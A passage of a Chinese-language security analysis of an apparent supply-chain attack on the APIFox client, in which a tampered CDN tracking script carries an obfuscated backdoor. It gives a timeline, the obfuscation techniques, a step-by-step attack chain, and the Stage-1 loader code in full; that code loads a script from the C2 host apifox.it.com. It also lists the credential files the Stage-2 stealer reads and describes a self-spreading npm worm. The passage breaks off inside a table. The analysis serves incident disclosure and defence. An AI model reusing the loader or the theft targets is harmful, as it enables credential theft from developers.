style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">02 时间线</span></span></strong></p></div></div></div></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">时间</span></strong></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">事件</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026-03-04</span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">恶意代码首次出现在 CDN 服务器</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026-03-05</span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Wayback Machine 抓取并存档投毒版本（77KB）</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026-03-12 ~ 03-20</span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">观测到至少 10 次不同的 Stage-2 载荷下发</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026-03-22</span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">C2 域名 apifox.it.com 下线</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026-03-23</span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">APIFox 发布 2.8.19 修复版本</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026-03-25 上午</span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">安全社区发布预警</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026-03-25 下午</span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">APIFox 官方发布安全公告</span></p></div></div></td></tr></tbody></table></p></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">值得注意的是，C2 域名在官方公告发布前 3 天已经下线。官方公告称&#34;根据部分用户反馈和专业人员分析&#34;，暗示可能是外部通知触发了事件处置。</span></p><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">03 攻击链还原</span></span></strong></p></div></div></div></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击入口：CDN 文件投毒</span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者篡改了 CDN 上的 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">apifox-app-event-tracking.min.js</span></span><span leaf=""> 文件，文件大小从正常的 34KB 膨胀到 77KB。该文件是一个埋点追踪脚本，每次 APIFox 启动时从 CDN 动态加载。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">投毒文件由两部分组成：前半部分（~34KB）是合法的 Apifox 事件追踪 SDK，包含 GA4、百度统计、阿里云 SLS 等多平台事件追踪模块；后半部分（~42KB）是严重混淆的恶意后门代码。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者部署了七层混淆技术：</span></p></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">技术</span></strong></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">说明</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">字符串数组旋转</span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">_0x10e4() </span></span><span leaf="">函数返回 300+ 条编码字符串，通过 IIFE 暴力旋转数组到目标偏移（偏移量 275）</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Base64 + RC4 双层解密</span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">_0x3fb9() </span></span><span leaf="">解码器对字符串先 Base64 解码，再 RC4 解密还原明文</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">代理函数</span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">_0x2c838a</span></span><span leaf="">、</span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">_0x15440c</span></span><span leaf=""> 等函数包装解码器，增加间接调用层次</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">十六进制算术混淆</span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="background-color: rgba(254, 255, 255, 0);box-sizing: border-box;"><span leaf="">所有数值常量使用复杂十六进制算术表达式（如 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">0x2425+-0x1*-0x415+0x80b*-0x5</span></span><span leaf="">）</span></span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">控制流扁平化</span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">通过对象属性间接调用函数，打乱执行逻辑顺序</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">死代码注入</span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">大量永远不会执行的代码分支，增加分析干扰</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">反调试陷阱</span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">toString</span></span><span leaf=""> 正则检测 + 条件无限递归，检测到调试器则触发死循环</span></p></div></div></td></tr></tbody></table></p></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">入口混淆层的</span><strong style="box-sizing: border-box;"><span leaf="">关键设计缺陷</span></strong><span leaf="">是将 RSA-2048 私钥硬编码在客户端代码中，这使得任何获取代码的人都能解密 C2 通信——这也是完整还原攻击链的关键。</span></p><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">完整攻击流程</span></strong></p></div></div></div></div><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="markdown"><code><span leaf="">Plain Text</span></code><br/><code><span leaf=""><span class="code-snippet__bullet">1.</span> Apifox 启动，加载被投毒的 event-tracking.min.js (77KB)</span></code><br/><code><span leaf="">   ↓</span></code><br/><code><span leaf=""><span class="code-snippet__bullet">2.</span> 恶意代码执行：采集机器指纹、窃取 Apifox accessToken、RSA-2048 加密敏感数据</span></code><br/><code><span leaf="">   ↓</span></code><br/><code><span leaf=""><span class="code-snippet__bullet">3.</span> 请求 C2: GET /public/apifox-event.js</span></code><br/><code><span leaf="">   Headers: af<span class="code-snippet__emphasis">_uuid, af_</span>os, af<span class="code-snippet__emphasis">_user, af_</span>name...</span></code><br/><code><span leaf="">   返回: RSA 加密的 Stage-1 loader (344 bytes)</span></code><br/><code><span leaf="">   ↓</span></code><br/><code><span leaf=""><span class="code-snippet__bullet">4.</span> RSA 解密 Stage-1，执行 eval()</span></code><br/><code><span leaf="">   动态创建 <span class="code-snippet__tag">&lt;</span><span class="code-snippet__tag"><span class="code-snippet__name">script</span></span><span class="code-snippet__tag">&gt;</span> 标签加载 Stage-2</span></code><br/><code><span leaf="">   路径: /&lt;随机8位hex&gt;.js (一次性URL，用完即404)</span></code><br/><code><span leaf="">   ↓</span></code><br/><code><span leaf=""><span class="code-snippet__bullet">5.</span> Stage-2 执行（明文 Node.js）</span></code><br/><code><span leaf="">   v1 - 窃取 SSH、历史、Git 凭证</span></code><br/><code><span leaf="">   v2 - 新增 K8s 配置、npmrc、目录遍历</span></code><br/><code><span leaf="">   ↓</span></code><br/><code><span leaf=""><span class="code-snippet__bullet">6.</span> 数据外泄：JSON → Gzip → AES-256-GCM → Base64 → POST</span></code><br/><code><span leaf="">   ↓</span></code><br/><code><span leaf=""><span class="code-snippet__bullet">7.</span> 持久化：30分钟~3小时随机间隔，重新轮询 C2</span></code><br/></pre></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者部署自传播 npm 蠕虫 &#34;CanisterWorm&#34;，自动窃取 npm token、识别可发布包、修改版本号后重新发布。涉及 @EmilGroup（28 个包）、@opengov（16 个包）等多个组织域。针对伊朗系统的破坏性路径会删除主机文件系统。</span></p><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Stage-1：加载器</span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">C2 服务器返回 344 字节的 Base64 编码 RSA 加密数据，解密后为：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__title">JavaScript</span></span></code><br/><code><span leaf="">(<span class="code-snippet__keyword">function</span>(){</span></code><br/><code><span leaf="">  <span class="code-snippet__keyword">var</span> s = <span class="code-snippet__variable">document</span>.<span class="code-snippet__title">createElement</span>(<span class="code-snippet__string">&#39;script&#39;</span>);</span></code><br/><code><span leaf="">  s.<span class="code-snippet__property">src</span> = <span class="code-snippet__string">&#39;<a href="https://apifox.it.com/" target="_blank">https://apifox.it.com/</a>&lt;随机8位hex&gt;.js&#39;</span>;</span></code><br/><code><span leaf="">  s.<span class="code-snippet__property">onload</span> = <span class="code-snippet__keyword">function</span>(){ s.<span class="code-snippet__property">parentNode</span> &amp;&amp; s.<span class="code-snippet__property">parentNode</span>.<span class="code-snippet__title">removeChild</span>(s) };</span></code><br/><code><span leaf="">  <span class="code-snippet__variable">document</span>.<span class="code-snippet__property">head</span>.<span class="code-snippet__title">appendChild</span>(s)</span></code><br/><code><span leaf="">})()</span></code><br/></pre></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关键特点：路径随机化（每次生成不同的 Stage-2 文件名）、用完即焚（历史路径返回 404）、反取证（脚本加载后自动从 DOM 移除）、服务端绑定（C2 读取 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">af_uuid</span></span><span leaf=""> header，将其硬编码到 Stage-2 代码中）。</span></p><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Stage-2：信息窃取</span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Stage-2 为明文 Node.js 脚本，甚至保留了完整的中文开发注释。存在两个版本：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">v1 版本（~3,400 字节）窃取目标：</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">全平台：~/.ssh/* 递归读取整个目录</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">macOS/Linux：~/.zsh_history、~/.bash_history、~/.git-credentials、ps aux</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Windows：tasklist、额外扫描 D:\、E:\、F:\ 盘符</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">v2 版本（~4,400 字节）新增窃取：</span></strong></p></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">目标</span></strong></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">说明</span></b></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: 